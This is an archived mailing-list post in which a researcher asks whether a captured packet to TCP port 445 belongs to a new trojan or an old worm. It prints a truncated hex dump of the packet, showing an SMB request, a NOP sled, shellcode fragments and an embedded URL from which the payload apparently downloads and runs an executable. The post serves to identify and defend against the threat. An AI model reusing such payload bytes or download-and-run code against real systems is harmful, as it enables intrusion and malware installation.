lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.GSO.4.58.0408311434040.2605@gradlab.ucsd.edu>
From: susingh at cs.ucsd.edu (Sumeet SINGH)
Subject: Is this a new Trojan?

hi,

We've been seeing a large number of copies of a TCP packet to port 445,
that includes the following portion that we have not seen before:

00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8  .....SMB%.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04  ................
00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00  ..`.............
00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02  .........T...T..
00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00  .&..@...\.P.I.P.
45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00  E.\.............
a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00  ................
ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74  .............Xht
74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31  tp://202.1.200.1
39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df  9:2446/x.exe....
df df df df df df df df df 4d 6f 7a 69 6c 6c 61  .........Mozilla
2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 8b  /4.0.]3.f....u..
fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88  .....u.F..,0F4..

(the remainder of the packet has been removed)

Has anyone seen this before?
The IP address (202.1.200.19) is unreachable.

Is this an old exploit (worm/bot) that just took its time to come around
to us?

-- sumeet
PhD. Student
UCSD


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ